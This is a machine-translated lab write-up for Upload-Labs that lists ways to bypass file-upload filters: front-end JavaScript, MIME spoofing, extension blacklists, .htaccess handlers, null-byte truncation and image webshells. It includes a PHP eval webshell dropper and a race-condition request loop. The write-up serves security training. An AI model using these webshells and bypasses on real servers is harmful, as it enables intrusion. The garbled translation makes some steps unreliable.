Check-Labs writeup welcome the Upload https://www.cnblogs.com/Qi-Lin/p/11296761.html
Bypassing the front-end
Deleted bypassing js js, removed off by bp in the proxy option in the options javascript script, or directly in the browser
Bypassing the mime-type
mime is a Multipurpose Internet Mail Extensions type, file extension for a set open manner, as the content-type .png in the data packet is image / png, can be bypassed by truncating bp
Bypass blacklist
Blacklist whitelist no security, there may be omissions
- php can be changed php3, php4, php5, phtml upload
- .htaccess bypass, .htaccess is an apache server configuration file, can achieve 301 redirect, custom 404 error page, change the file name extension, to block or allow user access to specific directories or files. .htaccess content can be written sethandler application / x-httpd-php, which can set the current directory all files with php resolution. However, in the corresponding http.conf should be set to all allowoverride
- Bypassing the case, only applies to windows, windows not case sensitive
- Space bypass, the windows in the space after the file name extension will be short handle
- Dot bypassed the last one. The windows will be automatically removed
- Special symbols bypass, under windows, if the uploaded file name suffix php :: $ DATA generate suffix in Php file server, content, and upload the same content, and parsed
- Combination of bypass, such as space 1.php.
- If the upload size limit may have to upload a small file, then use small files upload large files
- If the code is replaced with an empty blacklist, you can use double the bypass
Bypass the whitelist
When the system reads the file name, if you encounter 0x00 think reading is completed, such as: 1.php0x00.jpg think when you upload a jpg, but to save the file in the new 1.php file
but php5.3 after the release has been repaired, and by gpc, affect the function addslashes
get cut off type
post cut
Pictures webshell
Use pictures webshell need to use the file that contains the vulnerability, it is because the use of include in php, file include_once, require, require_once function included regardless of the file name is what will be used as php code execution
- Can be added to the relevant character in the code, as simple as:
GIF98A
<?php
phpinfo()
?>- After steganography can also use the Trojan added to the picture terminator
The use of competitive conditions uploads
- After the file is uploaded first save as a temporary file, and then rename the saved file, and if the site allowed to upload any file, you may check the upload file contains webshell, if it contains deleted, use unlink to delete files. You may not find the specified type, use unlink to delete. So, if access uploaded files before deleting, will execute code file
- For example: the following code is written in a file, this file is executed, a new file containing the Trojan shell.php
<?php
fputs(fopen('shell.php',w),'<?php @eval($_post["pass"]) ?>');
?>- When uploading constantly sending http request, request the file, you can use a python script, such as:
import requests
while true:
requests.get("路径")